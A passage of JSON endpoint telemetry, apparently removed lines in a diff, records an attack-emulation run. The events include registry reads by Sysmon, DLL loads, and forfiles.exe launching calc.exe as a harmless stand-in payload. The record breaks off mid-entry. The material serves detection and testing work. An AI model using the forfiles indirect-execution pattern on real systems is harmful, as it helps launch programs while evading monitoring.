"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "forfiles.exe", - "image_path": "C:\\Windows\\System32\\forfiles.exe", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021120000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\calc.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "forfiles.exe", - "parent_process_path": "C:\\Windows\\System32\\forfiles.exe", - "pid": 2616, - "ppid": 4500, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "create", - "timestamp": 131883574021320000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}", - "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "calc.exe", - "image_path": "C:\\Windows\\System32\\calc.exe", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021260000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021260000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": 